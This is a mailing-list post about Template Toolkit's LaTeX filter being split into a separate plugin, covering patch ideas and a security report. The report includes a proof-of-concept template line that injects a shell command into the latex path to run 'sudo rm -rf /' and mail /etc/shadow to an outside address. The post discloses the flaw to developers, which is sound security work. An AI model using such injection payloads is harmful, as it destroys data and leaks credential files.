Andy Wardley wrote:
... It also removes the latex filter which I had broken but not
removed in 2.15.
There's also the new Template-Latex distribution available from here:
http://tt2.org/download/Template-Latex-2.16.tar.gz
This provides the Latex plugin which defines the latex filter which is
no longer a core part of TT. It also contains the Template::Latex
module, a wrapper around the Template module which pre-defines the
filter for you and gives you some extra Latex configuration options.
Almost two years ago I made some changes to the LaTeX filter and
submitted a patch, but it did not get applied. The changes were to make
the filter optionally run the various LaTeX auxiliary programs (bibtex
and makeindex) and to rerun latex or pdflatex a number of time (or until
all cross references stabilize). There are some other changes I had in
mind like adding the directory of the template to TEXINPUTS for the
child processes (which are run in a temporary directory) can find files
for \include and \includegraphics.
A lot of these options are potentially expensive; for example with a
document having a table of contents, an index and bibliography you could
be running latex three times to get the TOC generated, forward
references and page numbers to settle, then bibtex for the bibliography,
latex a couple of times in case the pagination changes, makeindex and
then latex one or two more times. My patch checks the output from latex
to see if whether it gets the message "Label(s) may have changed" to
decide whether to re-run latex, so as to avoid unnecessary runs, but
nevertheless running the latex filter on a complex document is expensive.
I use the LaTeX filter quite a bit, so now that the LaTeX plugin has
been separated out of the main Template Toolkit distribution I will
revisit my changes and suggest how the new separate plugin could be
enhanced.
On a different issue, from a cursory scan of the new plugin I am a
little worried about security implications implied by the fact that
templates can specify the absolute paths of the latex, pdflatex and
dvips executables. This would appear to give the template writer carte
blanche to invoke any executable with the rights of the user processing
the templates. The filter does not even seem to validate these paths
for embedded whitespace or shell escapes and passes constructed command
lines to the shell (via "system"), so I could try something like:
[% USE latex(latex => 'sudo rm -rf /;',
dvips => "sudo sh -c 'mail badguy-JXiH2Qp+pBI@xxxxxxxxxxxxxxxx
</etc/shaddow';") %]
Finally, now that 2.15 is out I will have another look at the TT2 quick
reference card to update it to reflect some of the new features that
have appeared. Any comments on the card or suggestions are always welcome.
Regards
Andrew
--
Andrew Ford, Director Pauntley Prints / Ford & Mason Ltd
A.Ford-OfKrLxNBp1iX/4koqx8SDw@xxxxxxxxxxxxxxxx South Wing Compton House
pauntley-prints.co.uk Compton Green, Redmarley Tel: +44 1531 829900
ford-mason.co.uk Gloucester GL19 3JB Fax: +44 1531 829901
refcards.com cronolog.org Great Britain Mobile: +44 7785 258278
|
Try Searching:
servers, voip, java, networking, microsoft ...
|
|
|
| 
